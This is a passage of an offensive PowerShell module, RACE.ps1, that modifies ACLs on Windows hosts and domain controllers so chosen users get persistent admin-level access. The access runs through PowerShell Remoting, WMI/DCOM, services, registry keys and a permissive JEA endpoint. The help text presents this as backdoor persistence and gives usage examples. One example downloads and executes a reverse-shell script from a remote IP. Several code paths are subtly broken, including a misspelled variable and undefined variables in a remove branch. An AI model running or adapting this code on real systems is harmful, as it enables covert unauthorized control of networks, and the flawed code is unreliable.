<# File: RACE.ps1 Author: Nikhil Mittal (@nikhil_mitt) Description: A PowerShell module to abuse ACLs in Windows machines and Active Directory. Required Dependencies: ActiveDirectory Module for the Set-ADAcl and Set-DCPermissions functions. #> ###################### Functions to create persistence ###################### function Set-RemotePSRemoting { <# .SYNOPSIS Function which can be used to modify ACL of PowerShell Remoting to provide access for non-admin Principals. .DESCRIPTION The function takes a SamAccountName and adds permissions to the ACL of PowerShell Remoting for the Principal. The function needs elevated shell locally and administrative privileges on a remote target. It is possible to remove the entries added by the function by using the -Remove option. The function is very useful as a backdoor on any machine but more so on high value targets like Domain controllers. If you get an error like 'The I/O operation has been aborted' - ignore it. The ACl has been most likely modified. .PARAMETER SamAccountName SamAccountName of the user or group which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-RemotePSRemoting -SamAccountName labuser –Verbose Use the above command to add permissions on the local machine for labuser to access PowerShell remoting. .EXAMPLE PS C:\> Set-RemotePSRemoting -SamAccountName labuser -ComputerName targetserver -Credential admin Use the above command to add permissions on the remote machine for labuser to access PowerShell remoting. .EXAMPLE PS C:\> Set-RemotePSRemoting -SamAccountName labuser -ComputerName targetserver -Credential admin -Remove Remove the permissions added for labuser from the remote machine. .LINK https://github.com/ssOleg/Useful_code/blob/master/Set-RemoteShellAccess.ps1 https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $SamAccountName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) $RemoteScriptBlock = { Param( [Parameter( Mandatory = $True)] [String] $SamAccountName, $Remove ) $SID = (New-Object System.Security.Principal.NTAccount($SamAccountName)).Translate([System.Security.Principal.SecurityIdentifier]).value # Build an SD based on existing DACL $existingSDDL = (Get-PSSessionConfiguration -Name "Microsoft.PowerShell" -Verbose:$false).SecurityDescriptorSDDL Write-Verbose "Existing ACL for PSRemoting is $existingSDDL" $isContainer = $false $isDS = $false $SecurityDescriptor = New-Object -TypeName Security.AccessControl.CommonSecurityDescriptor -ArgumentList $isContainer,$isDS, $existingSDDL if (!$Remove) { #Create Full Control ACE entries for the target user $accessType = "Allow" #FullControl - https://blog.cjwdev.co.uk/2011/06/28/permissions-not-included-in-net-accessrule-filesystemrights-enum/ $accessMask = 268435456 $inheritanceFlags = "none" $propagationFlags = "none" $SecurityDescriptor.DiscretionaryAcl.AddAccess($accessType,$SID,$accessMask,$inheritanceFlags,$propagationFlags) | Out-Null # Combined SDDL $newSDDL = $SecurityDescriptor.GetSddlForm("All") Write-Verbose "Updating ACL for PSRemoting." Set-PSSessionConfiguration -name "Microsoft.PowerShell" -SecurityDescriptorSddl $newSDDL -force -Confirm:$false -Verbose:$false | Out-Null Write-Verbose "New ACL for PSRemoting is $newSDDL" } elseif ($Remove) { foreach ($SDDL in $SecurityDescriptor.DiscretionaryAcl) { if ($SDDL.SecurityIdentifier.Value -eq $SID) { Write-Verbose "Removing access for user $SamAccountName." $SecurityDescriptor.DiscretionaryAcl.RemoveAccess([System.Security.AccessControl.AccessControlType]::Allow,$SID,$SDDL.AccessMask,$SDDL.InheritanceFlags,$SDDL.PropagationFlags) | Out-Null # Combined SDDL $newSDDL = $SecurityDescriptor.GetSddlForm("All") Set-PSSessionConfiguration -name "Microsoft.PowerShell" -SecurityDescriptorSddl $newSDDL -force -Confirm:$false -Verbose:$false | Out-Null $existingSDDL = (Get-PSSessionConfiguration -Name "Microsoft.PowerShell" -Verbose:$false).SecurityDescriptorSDDL Write-Verbose "New ACL for PSRemoting is $existingSDDL" } } } } if ($ComputerName) { Invoke-Command -ScriptBlock $RemoteScriptBlock -ComputerName $ComputerName -Credential $Credential -ArgumentList $SamAccountName,$Remove } else { Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList $SamAccountName,$Remove } } function Set-RemoteWMI { <# .SYNOPSIS Function which can be used to modify ACLs of DCOM and WMI namespaces to provide non-admin Princiapls access to WMI. .DESCRIPTION The function takes a SamAccountName and adds permissions equivalent to Built-in Administrators to the ACL of DCOM and WMI namespaces (all namespaces by default). The function needs elevated shell locally and administrative privileges on a remote target. It is possible to remove the entries added by the function by using the -Remove option. It is also possible to modify only a particular namespace instead of all the namespaces by using the -NameSpace parameter with -NotAllNamsespaces switch. The function is very useful as a backdoor on any machine but more so on high value targets like Domain controllers. Can also be used with 'evil' WMI providers like https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider and https://github.com/subTee/EvilWMIProvider .PARAMETER SamAccountName SamAccountName of the user or group which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER Namespace The namespace whose permissions will be modified. Default is "root" and all sub-namespaces or nested namespaces. .PARAMETER NotAllNamespaces Use this switch to modify permissions of only a particular namespaces and not the nested ones. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-RemoteWMI -SamAccountName labuser –Verbose Use the above command to add permissions on the local machine for labuser to access all namespaces remotely. .EXAMPLE PS C:\> Set-RemoteWMI -SamAccountName labuser -ComputerName 192.168.0.34 -Credential admin -Verbose Use the above command to add permissions on the remote machine for labuser to access all namespaces remotely. .EXAMPLE PS C:\> Set-RemoteWMI -SamAccountName labuser -ComputerName 192.168.0.34 -Credential admin –namespace 'root\cimv2' -Verbose Use the above command to add permissions on the remote machine for labuser to access root\cimv2 and nested namespaces remotely. .EXAMPLE PS C:\> Set-RemoteWMI -SamAccountName labuser -ComputerName 192.168.0.34 -Credential admin –namespace 'root\cimv2' -NotAllNamespaces -Verbose Use the above command to add permissions on the remote machine for labuser to access only root\cimv2 remotely. .EXAMPLE PS C:\> Set-RemoteWMI -SamAccountName labuser -ComputerName 192.168.0.34 -Credential admin -Remove -Verbose Remove the permissions added for labuser from the remote machine. .LINK https://docs.microsoft.com/en-us/dotnet/framework/wcf/diagnostics/wmi/index https://unlockpowershell.wordpress.com/2009/11/20/script-remote-dcom-wmi-access-for-a-domain-user/ https://blogs.msdn.microsoft.com/wmi/2009/07/27/scripting-wmi-namespace-security-part-3-of-3/ https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $SamAccountName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Position = 3, Mandatory = $False)] [String] $Namespace = 'root', [Parameter(Mandatory = $False)] [Switch] $NotAllNamespaces, [Parameter(Mandatory = $False)] [Switch] $Remove ) $SID = (New-Object System.Security.Principal.NTAccount($SamAccountName)).Translate([System.Security.Principal.SecurityIdentifier]).value #Create ACE entries for the target user #Check if permission is to be set on all namespaces or just the specified namespace if ($NotAllNamespaces) { $SDDL = "A;;CCDCLCSWRPWPRCWD;;;$SID" } else { $SDDL = "A;CI;CCDCLCSWRPWPRCWD;;;$SID" } $DCOMSDDL = "A;;CCDCLCSWRP;;;$SID" if ($ComputerName) { #Get an object of the StdRegProv class $RegProvider = Get-WmiObject -Namespace root\default -Class StdRegProv -List -ComputerName $ComputerName -Credential $Credential #Get an object of the __SystemSecurity class of target namespace which will be used to modfy permissions. $Security = Get-WmiObject -Namespace $Namespace -Class __SystemSecurity -List -ComputerName $ComputerName -Credential $Credential $Converter = Get-WmiObject -Namespace root\cimv2 -Class Win32_SecurityDescriptorHelper -List -ComputerName $ComputerName -Credential $Credential } else { #Get an object of the StdRegProv class $RegProvider = Get-WmiObject -Namespace root\default -Class StdRegProv -List #Get an object of the __SystemSecurity class of target namespace which will be used to modfy permissions. $Security = Get-WmiObject -Namespace $Namespace -Class __SystemSecurity -List $Converter = Get-WmiObject -Namespace root\cimv2 -Class Win32_SecurityDescriptorHelper -List } #Get the current settings $DCOM = $RegProvider.GetBinaryValue(2147483650,"Software\Microsoft\Ole","MachineLaunchRestriction").uValue $binarySD = @($null) $result = $Security.PSBase.InvokeMethod("GetSD",$binarySD) $outsddl = $converter.BinarySDToSDDL($binarySD[0]) Write-Verbose "Existing ACL for namespace $Namespace is $($outsddl.SDDL)" $outDCOMSDDL = $converter.BinarySDToSDDL($DCOM) Write-Verbose "Existing ACL for DCOM is $($outDCOMSDDL.SDDL)" if (!$Remove) { #Create new SDDL for WMI namespace and DCOM $newSDDL = $outsddl.SDDL += "(" + $SDDL + ")" Write-Verbose "New ACL for namespace $Namespace is $newSDDL" $newDCOMSDDL = $outDCOMSDDL.SDDL += "(" + $DCOMSDDL + ")" Write-Verbose "New ACL for DCOM $newDCOMSDDL" $WMIbinarySD = $converter.SDDLToBinarySD($newSDDL) $WMIconvertedPermissions = ,$WMIbinarySD.BinarySD $DCOMbinarySD = $converter.SDDLToBinarySD($newDCOMSDDL) $DCOMconvertedPermissions = ,$DCOMbinarySD.BinarySD #Set the new values $result = $Security.PsBase.InvokeMethod("SetSD",$WMIconvertedPermissions) $result = $RegProvider.SetBinaryValue(2147483650,"Software\Microsoft\Ole","MachineLaunchRestriction", $DCOMbinarySD.binarySD) } elseif ($Remove) { Write-Verbose "Removing added entries" $SDDL = "(" + $SDDL + ")" $revertsddl = ($outsddl.SDDL).Replace($SDDL,"") Write-Verbose "Removing permissions for $SamAccountName from ACL for $Namespace namespace" $DCOMSDDL = "(" + $DCOMSDDL + ")" $revertDCOMSDDL = ($outDCOMSDDL.SDDL).Replace($DCOMSDDL,"") Write-Verbose "Removing permissions for $SamAccountName for DCOM" $WMIbinarySD = $converter.SDDLToBinarySD($revertsddl) $WMIconvertedPermissions = ,$WMIbinarySD.BinarySD $DCOMbinarySD = $converter.SDDLToBinarySD($revertDCOMSDDL) $DCOMconvertedPermissions = ,$DCOMbinarySD.BinarySD #Set the new values $result = $Security.PsBase.InvokeMethod("SetSD",$WMIconvertedPermissions) $result = $RegProvider.SetBinaryValue(2147483650,"Software\Microsoft\Ole","MachineLaunchRestriction", $DCOMbinarySD.binarySD) Write-Verbose "The new ACL for namespace $Namespace is $revertsddl" Write-Verbose "The new ACL for DCOM is $revertDCOMSDDL" } } function Set-RemoteServicePermissions { <# .SYNOPSIS Function which can be used to modify Security Descriptors of services on local or remote machine. .DESCRIPTION The function takes a SamAccountName and adds permissions to the security descriptor of services for the Principal. The function needs elevated shell locally and administrative privileges on a remote target. Note that there will be System logs for service creation or config change. If target service is SCManager. It allows creating new services but we still need to provide the SamAccountName permissions to modify the service configuration. .PARAMETER SamAccountName SamAccountName which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER ServiceName The target service name. By default, scmanager is the target service. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER SecurityDescriptor The SecurityDescriptor to be set on the target service. If not provided, then the function creates one. .PARAMETER Rights The Rights flag for SecurityDescriptor. By default, 'CCDCLCSWRPWPDTLOCRSDRCWDWO' is used. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName scmanager -Verbose PS C:\> Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'ops\proxyuser' -CreateService evilsvc -SamAccountName labuser -Verbose In the above commands, the first command modifies the Security Descriptor of scmanager on the target machine. THe second command (which is a separate function) sets a payload for executable of 'evilsvc' service which adds 'ops\proxyuser' to the local administrators group. It also suggests to run the below command which provides 'labuser' the permission to modify 'evilsvc' Set-RemoteServicePermissions -SamAccountName labuser -ServiceName evilsvc -ComputerName ops-mssql PS C:\> sc.exe \\ops-mssql start evilsvc Run the above command as 'labuser' to execute the payload set as executable of evilsvc. .EXAMPLE PS C:\> Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-mssql -ServiceName ALG -Verbose Use the above command to modify permissions for the 'ALG' service to give 'labuser' modify rights. PS C:\> Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'labuser' -ServiceName ALG -Verbose Run the above command as 'labuser' to configure ALG to run as SYSTEM and modify its executable path to add 'labuser' or other Principal provided in the UserName parameter to the local adminisrators group on the target machines. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $SamAccountName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [String] $ServiceName = "scmanager", [Parameter(Position = 3, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Position = 4, Mandatory = $False)] [String] $SecurityDescriptor, [Parameter(Position = 5, Mandatory = $False)] [String] $Rights = "CCDCLCSWRPWPDTLOCRSDRCWDWO", [Parameter(Mandatory = $False)] [Switch] $Remove ) # Retreive SID of the user $SID = (New-Object System.Security.Principal.NTAccount($SamAccountName)).Translate([System.Security.Principal.SecurityIdentifier]).value # Check if user has provided Security Descriptor if ($SecurityDescriptor) { $newSDDL = $SecurityDescriptor } # if not, provide permissions over the target service to the provided user else { if ($ServiceName -eq 'scmanager') { $SD = "(A;;GA;;;$SID)" } else { $SD = "(A;;$Rights;;;$SID)" } } if ($ComputerName) { if ($Remove) { Write-Verbose "For future use. Currently, there is no automatic clean up" } else { Write-Verbose "The existing ACL of the $ServiceName service on $ComputerName. Please note this as there is no automatic clean up." $ExistingSDDL = sc.exe \\$ComputerName sdshow $ServiceName $ExistingSDDL[1] $newSDDL = $ExistingSDDL[1].Insert(2,$SD) Write-Verbose "New ACL of the $ServiceName service on $ComputerName." $newSDDL # Modify ACL of the target service Write-Verbose "Modifying ACL of the $ServiceName service on $ComputerName." sc.exe \\$ComputerName sdset $ServiceName $newSDDL } } else { if ($Remove) { Write-Verbose "For future use. Currently, there is no automatic clean up" } Write-Verbose "The existing ACL of the $ServiceName service. Please note this as is no automatic clean up." $ExistingSDDL = sc.exe sdshow $ServiceName $ExistingSDDL[1] Write-Verbose "New ACL of the $ServiceName service." $newSDDL # Modify ACL of the target service Write-Verbose "Modifying ACL of the $ServiceName service." sc.exe sdset $ServiceName $newSDDL } } function Set-RemoteRegistryPermissions { <# .SYNOPSIS Function which can be used to modify Permissions of Remote Registry by modifying a registry key on local or remote machine. .DESCRIPTION The function modifies the Permissions for the registry key 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg' which controls access to Registry remotely. The function needs elevated shell locally and administrative privileges on a remote target. Currently, the function uses PowerShell Remoting to modify the permissions. .PARAMETER SamAccountName SamAccountName which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-RemoteRegistryPermissions -SamAccountName labuser -ComputerName ops-mssql -Verbose Use the above command to modify permissions of the 'Remote Registry' key on the target machine to allow 'labuser' access to Remote Registry. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $SamAccountName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) # Use PSRemoting to access the registry key. # Can also use WMI or Win32.RegistryKey class. Can implement in future by providing Procotol option. $RemoteScriptBlock = { Param( [Parameter( Mandatory = $True)] [String] $SamAccountName, $Remove ) if (!$Remove) { # Get the existing ACL for Remote Registry key $RegKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg' Write-Verbose "Getting the existing ACL for $RegKey" $ACL = Get-Acl $RegKey # Provide ReadKey permission to the user which we control $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'ReadKey','Allow') $ACL.AddAccessRule($ACE) # Set the ACL Write-Verbose "Setting ACL for Remote Registry $RegKey" Set-Acl $RegKey -AclObject $ACL } } if ($ComputerName) { Write-Verbose "Executing on $ComputerName." Invoke-Command -ScriptBlock $RemoteScriptBlock -ComputerName $ComputerName -Credential $Credential -ArgumentList $SamAccountName,$Remove } else { Write-Verbose "Executing on the local computer." Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList $SamAccountNam,$Remove } } function Set-RegistryImageFileExecution { <# .SYNOPSIS Function to modify permissions for Image File Execution Options and NLA registry key. .DESCRIPTION The function modifies the Permissions for the registry key 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options' and 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'. The function needs elevated shell locally and administrative privileges on a remote target. Currently, the function uses PowerShell Remoting to modify the permissions. .PARAMETER SamAccountName SamAccountName which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-RegistryImageFileExecution -SamAccountName labuser -ComputerName ops-mssql -Verbose Use the above command to modify permissions of the 'Image File Execution Options' key on the target machine to allow 'labuser' permissions to modify the key and its subkeys. PS C:\> Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose Above command sets payload for sethc and disables NLA. .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $SamAccountName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) # Use PSRemoting to access the registry key. # Can also use WMI or Win32.RegistryKey class. Can implement in future by providing Procotol option. $RemoteScriptBlock = { Param( [Parameter( Mandatory = $True)] [String] $SamAccountName, $Remove ) if (!$Remove) { # Get the existing ACL for Image File Execution key. $RegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options' Write-Verbose "Getting the existing ACL for $RegKey" $ACL = Get-Acl $RegKey # Provide minimum required permission to the user which we control $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'QueryValue','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'SetValue','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'CreateSubkey','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'EnumerateSubKeys','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'ReadPermissions','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) # Set the ACL Write-Verbose "Setting ACL for $RegKey" Set-Acl $RegKey -AclObject $ACL # Get the existing ACL NLA Registry key. $RegKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' Write-Verbose "Getting the existing ACL for $RegKey" $ACL = Get-Acl $RegKey # Provide minimum required permission to the user which we control $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'QueryValue','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'SetValue','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'CreateSubkey','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'EnumerateSubKeys','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) $ACE = New-Object System.Security.AccessControl.RegistryAccessRule($SamAccountName,'ReadPermissions','ContainerInherit','None','Allow') $ACL.AddAccessRule($ACE) # Set the ACL Write-Verbose "Setting ACL for Remote Registry $RegKey" Set-Acl $RegKey -AclObject $ACL } } if ($ComputerName) { Write-Verbose "Executing on $ComputerName." Invoke-Command -ScriptBlock $RemoteScriptBlock -ComputerName $ComputerName -Credential $Credential -ArgumentList $SamAccountName,$Remove } else { Write-Verbose "Executing on the local computer." Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList $SamAccountNam,$Remove } } function Set-DCOMPermissions { <# .SYNOPSIS Function which can be used to modify ACLs of DCOM provide non-admin Princiapls access to DCOM. .DESCRIPTION The function takes a SamAccountName and adds permissions equivalent to Built-in Administrators to the ACL of DCOM. The function needs elevated shell locally and administrative privileges on a remote target. It is possible to remove the entries added by the function by using the -Remove option. .PARAMETER SamAccountName SamAccountName of the user or group which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose Use the above command to add permissions on the target machine for labuser to execute commands using DCOM. Then use the below command as labuser to run commands: Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)' .LINK https://github.com/samratashok/RACE #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $UserName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $False)] [Switch] $Remove ) $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent()) if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) { Write-Warning "Run the script as an Administrator" Break } $SID = (New-Object System.Security.Principal.NTAccount($UserName)).Translate([System.Security.Principal.SecurityIdentifier]).value #Create ACE entries for the target user $SDDL = "A;;CCDCLCSWRPWPRCWD;;;$SID" $DCOMSDDL = "A;;CCDCLCSWRP;;;$SID" if ($ComputerName) { #Get an object of the StdRegProv class $RegProvider = Get-WmiObject -Namespace root\default -Class StdRegProv -List -ComputerName $ComputerName -Credential $Credential $Converter = Get-WmiObject -Namespace root\cimv2 -Class Win32_SecurityDescriptorHelper -List -ComputerName $ComputerName -Credential $Credential } else { #Get an object of the StdRegProv class $RegProvider = Get-WmiObject -Namespace root\default -Class StdRegProv -List $Converter = Get-WmiObject -Namespace root\cimv2 -Class Win32_SecurityDescriptorHelper -List } # Get the current settings for Launch Restrictions $DCOMLaunchRestrictions = $RegProvider.GetBinaryValue(2147483650,"Software\Microsoft\Ole","MachineLaunchRestriction").uValue $binarySDLaunchRestrictions = @($null) $outDCOMSDDLLaunchRestrictions = $converter.BinarySDToSDDL($DCOMLaunchRestrictions) Write-Verbose "Existing ACL for DCOM Launch Restrictions is $($outDCOMSDDLLaunchRestrictions.SDDL)" # Get the current settings for Default Launch Permissions $DCOMLaunchPermissions = $RegProvider.GetBinaryValue(2147483650,"Software\Microsoft\Ole","DefaultLaunchPermission").uValue $binarySDLaunchPermissionss = @($null) $outDCOMSDDLLaunchPermissions = $converter.BinarySDToSDDL($DCOMLaunchPermissions) Write-Verbose "Existing ACL for DCOM Launch Permissions is $($outDCOMSDDLLaunchPermissions.SDDL)" if (!$Remove) { #Create new SDDL for DCOM Launch Restriction $newDCOMSDDLLaunchRestrictions = $outDCOMSDDLLaunchRestrictions.SDDL += "(" + $DCOMSDDL + ")" Write-Verbose "New ACL for DCOM Launch Restrictions $newDCOMSDDLLaunchRestrictions" $binarySDLaunchRestrictions = $converter.SDDLToBinarySD($newSDDLLaunchRestrictions) $ConvertedPermissionsLaunchRestrictions = ,$binarySDLaunchRestrictions.BinarySD $DCOMbinarySDLaunchRestrictions = $converter.SDDLToBinarySD($newDCOMSDDLLaunchRestrictions) $DCOMconvertedPermissionsLaunchRestrictions = ,$DCOMbinarySDLaunchRestrictions.BinarySD #Create new SDDL for DCOM Launch Permissions $newDCOMSDDLLaunchPermissions = $outDCOMSDDLLaunchPermissions.SDDL += "(" + $DCOMSDDL + ")" Write-Verbose "New ACL for DCOM Launch Permissions is $newDCOMSDDLLaunchPermissions" $binarySDLaunchPermissions = $converter.SDDLToBinarySD($newSDDLLaunchPermissions) $ConvertedPermissionsLaunchPermissions = ,$binarySDLaunchPermissions.BinarySD $DCOMbinarySDLaunchPermissions = $converter.SDDLToBinarySD($newDCOMSDDLLaunchPermissions) $DCOMconvertedPermissionsLaunchPermissions = ,$DCOMbinarySDLaunchPermissions.BinarySD #Set the new values $result = $RegProvider.SetBinaryValue(2147483650,"Software\Microsoft\Ole","MachineLaunchRestriction", $DCOMbinarySDLaunchRestrictions.binarySD) $result = $RegProvider.SetBinaryValue(2147483650,"Software\Microsoft\Ole","DefaultLaunchPermission", $DCOMbinarySDLaunchPermissions.binarySD) } elseif ($Remove) { Write-Verbose "Removing added entries" $SDDL = "(" + $SDDL + ")" $revertsddl = ($outsddl.SDDL).Replace($SDDL,"") Write-Verbose "Removing permissions for $UserName from ACL for $Namespace namespace" $DCOMSDDL = "(" + $DCOMSDDL + ")" $revertDCOMSDDL = ($outDCOMSDDL.SDDL).Replace($DCOMSDDL,"") Write-Verbose "Removing permissions for $UserName for DCOM" $WMIbinarySD = $converter.SDDLToBinarySD($revertsddl) $WMIconvertedPermissions = ,$WMIbinarySD.BinarySD $DCOMbinarySD = $converter.SDDLToBinarySD($revertDCOMSDDL) $DCOMconvertedPermissions = ,$DCOMbinarySD.BinarySD #Set the new values $result = $Security.PsBase.InvokeMethod("SetSD",$WMIconvertedPermissions) $result = $RegProvider.SetBinaryValue(2147483650,"Software\Microsoft\Ole","MachineLaunchRestriction", $DCOMbinarySD.binarySD) Write-Verbose "The new ACL for namespace $Namespace is $revertsddl" Write-Verbose "The new ACL for DCOM is $revertDCOMSDDL" } } function Set-JEAPermissions { <# .SYNOPSIS Function which can be used to create a new JEA endpoint for PowerShell remoting to provide access for non-admin Principals. .DESCRIPTION The function takes a SamAccountName and creates a new JEA endpoint for PowerShell Remoting for the Principal. A new JEA endpoint, 'microsoft.powershell64', is registered on the target machine and all commands and cmdlets are allowed. The endpoint provides anyone connecting to the target machine local admin privileges and Domain Admin on a Domain Controller. Note that the DA privileges cannot be used to access any network resource. All the commands run on the endpoint are logged using PowerShell system-wide transcripts in the user's temp directory. Event logs are created for 'WinRM Virtual Users\WinRM_VA_1_domain_username' account. The function needs elevated shell locally and administrative privileges on a remote target. .PARAMETER SamAccountName SamAccountName of the user or group which will have remote access. .PARAMETER ComputerName Target computer. Not required when the function is used locally. .PARAMETER Credential Credential for the target remote computer. Not required if you already have administrative privileges on the remote computer. .PARAMETER ConfigName The name of the session configuration/JEA endpoint on the target machine. 'microsoft.powershell64' is used by default. .PARAMETER Remove Use this switch to remove permissions added by the function. .EXAMPLE PS C:\> Set-JEAPermissions -ComputerName ops-build -SamAccountName labuser -Verbose Use the above command to create a new JEA endpoint on the target machine which provides administrator privileges. Use the below command to connect to the target machine. Note the -ConfigurationName parameter: Enter-PSSession -ComputerName ops-build -ConfigurationName microsoft.powershell64 .LINK https://github.com/samratashok/RACE https://docs.microsoft.com/en-us/powershell/jea/overview #> [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $True)] [String] $SamAccountName, [Parameter(Position = 1, Mandatory = $False)] [String] $ComputerName, [Parameter(Position = 2, Mandatory = $False)] [ValidateNotNull()] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()] $Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Position = 3, Mandatory = $False)] [String] $ConfigName = 'microsoft.powershell64', [Parameter(Mandatory = $False)] [Switch] $Remove ) $RemoteScriptBlock = { Param( [Parameter( Mandatory = $True)] [String] $SamAccountName, [Parameter( Mandatory = $false)] [String] $ConfigName = 'microsoft.powershell64', $Remove ) $modulePath = "$env:ProgramFiles\WindowsPowerShell\Modules\JEARoles" if (!$modulePath) { Write-Verbose "Creating module directory at $modulePath" New-Item $modulePath -ItemType Directory -Force } New-ModuleManifest -Path (Join-Path $modulePath "JEARoles.psd1") -Description "Contains custom JEA Role Capabilities" # Create a folder for the role capabilities $roleCapabilityPath = Join-Path $modulePath "RoleCapabilities" Write-Verbose "Creating directory for Role capability file at $roleCapabilityPath" New-Item $roleCapabilityPath -ItemType Directory -Force $RoleFile = $ConfigName + '.psrc' $ConfigFile = $ConfigName + '.pssc' Write-Verbose "Creating Role Capability File." New-PSRoleCapabilityFile -Path (Join-Path $roleCapabilityPath $RoleFile) -Author "Admin" -CompanyName $ComputerName -Description "For System Administration." -ModulesToImport "Microsoft.PowerShell.Core" Write-Verbose "Creating Session Configuration File." New-PSSessionConfigurationFile -Path C:\ProgramData\$ConfigFile -SessionType Default -TranscriptDirectory $env:TEMP -RunAsVirtualAccount -RoleDefinitions @{ 